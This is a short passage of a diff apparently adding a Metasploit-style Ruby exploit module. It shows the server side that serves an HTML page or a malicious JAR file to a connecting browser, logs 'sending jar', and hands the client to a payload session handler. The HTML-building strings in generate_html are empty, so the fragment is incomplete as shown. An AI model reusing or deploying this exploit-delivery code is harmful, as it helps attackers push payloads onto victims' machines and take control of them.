Failed to generate the executable." ) + return + end + + end + + send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) + return + end + + print_status( "#{peer} - sending jar to ..." ) + send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) + + handler( cli ) + end + + def generate_html( data, jar, host, port ) + html = "" + html += "" + html += "" + html += "" if data + html += "" if jar + html += "" if host + html += "" if port + html += "" + return html + end + + def generate_jar() + return @jar_data + end + +end